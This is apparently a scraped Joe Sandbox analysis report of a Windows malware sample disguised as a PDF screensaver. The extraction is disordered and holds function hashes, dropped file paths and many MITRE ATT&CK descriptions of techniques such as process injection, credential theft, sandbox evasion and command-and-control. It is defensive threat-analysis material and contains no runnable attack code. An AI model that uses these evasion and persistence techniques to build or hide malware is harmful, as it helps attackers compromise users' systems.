Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6cf17f3c2b85e6d84567613a899768680021acc58279e10b535298667582a221
Instruction ID: aef7631b115877943ce78ed530ea6101a9c79c6ec82a9510627ccb7335a6100e
Opcode Fuzzy Hash: 6cf17f3c2b85e6d84567613a899768680021acc58279e10b535298667582a221
Instruction Fuzzy Hash: ABD0C9323C5354ABE668B7B0AD0AFD66A55AB54B10F9048757349AA1D0CDA46800C694

Function 00ABC21D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00ABC2B3
GetLastError.KERNEL32 ref: 00ABC2C1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ABC31C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: f47296a2ac5225ba2da0404eba2f6859ff37938c47603090e93400651dcf7c50
Instruction ID: d99d3a653c54b0a5483bc99c6758bb2ec92de66c941322910416d453ca61c9e8
Opcode Fuzzy Hash: f47296a2ac5225ba2da0404eba2f6859ff37938c47603090e93400651dcf7c50
Instruction Fuzzy Hash: 98417231600255ABDB219F65C844FEEBBEDAF42730FA4816AE8599B1A3DB319D01CB50

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nj230708full.pdf.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js

C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

C:\Users\user\AppData\Local\EchoArtisan Technologies\K

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winservices.exe.log

C:\Users\user\AppData\Local\Temp\186040\L

C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

C:\Users\user\AppData\Local\Temp\Aboriginal

C:\Users\user\AppData\Local\Temp\Amazon

C:\Users\user\AppData\Local\Temp\Brain

C:\Users\user\AppData\Local\Temp\Cinema

Windows Analysis Report
nj230708full.pdf.scr.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre